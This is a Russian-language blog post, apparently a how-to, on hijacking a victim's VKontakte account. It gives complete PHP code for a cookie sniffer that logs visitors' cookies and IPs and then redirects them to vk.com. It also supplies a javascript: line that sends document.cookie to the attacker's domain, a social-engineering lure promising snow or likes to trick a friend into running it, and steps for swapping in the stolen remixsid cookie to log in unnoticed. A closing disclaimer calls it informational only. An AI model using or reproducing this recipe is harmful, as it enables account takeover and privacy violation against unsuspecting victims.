vzlom

vzlom


В прошлом посте я рассказала вам, как добыть IP жертвы. Сегодня пройдемся по такому просто способу взлома, который может сделать каждый.


Расскажу, как я ломала страницы в 16-17 годах, сейчас я не занимаюсь такими мелочами, но способ поидее должен до сих пор работать.


Нам нужен будет ftp сервер. На нем надо создать папку, называем ее next.


Выбираем эту папку и жмем кнопку chmod, появятся галочки, ставим на все и жмем сохранить. Внутри папки создаём файл index.php


Далее ткрываем и пишем снифер:


<?php


//получаем данные с ссылки


$cookie = $_SERVER['REQUEST_URI'];


//ip адрес


$ip = $_SERVER['REMOTE_ADDR'];


//Создаём файл


$file = fopen("snif.dat","a+");


//вычисляем текущее время


$time = date("H:i:M:d");


//добавляем в строковую переменную куки + время + ip


$add_text = "$ip $time $cookie";


//записываем данные в файл


fputs($file,$add_text.",\r\n");


//закрываем файл


fclose($file);


//что бы не спалили переносим пользователя обратно в вк


header('Location:https://vk.com');


?>


Снифер готов. У нас должно получиться такая ссылка:


http://ваш_домен.ру/next/index.php


Далее открываем любой текстовый редактор (например блокнот) и пишем:


javascript:window.location.href = "http://ваш_домен.ру/next/index.php?cookie="+document.cookie; 


И скидывает это нашему дружку. Пишем ему например:

«Если поставишь это в адресную строку на твоей странице пойдет снег или на всех твоих фотках на странице будет по 10 000 лайков!».


Тут подход ко всем разный, надо немного использовать СИ.


Если он запустит этот скрипт в адресной строке, то её сразу переведёт в стартовую страницу Вконтакте. Никакой снег, конечно же, не пойдет там у него, но зато у нас на сервере будет дат файл с его куками.


Далее нам нужна подмена уведенных куков.


Самый простой способ:


Открываем браузер Опера > Настройки > Общие настройки > Расширенные > Cookies Opera Cookies.


Достаточно изменить только значение параметра куков remixsid.


Обновляем страницу и сразу же входим в другой аккаунт, без всякого логина и пароля. При этом наш друг не узнает, то что мы вошли на его страницу. Методы анонимности выбирайте сами. Такие дела.


Статья носит исключительно информационный характер и не призывает ни к каким действиям. Автор не несет никакой ответственности за размещенные материалы.

Report Page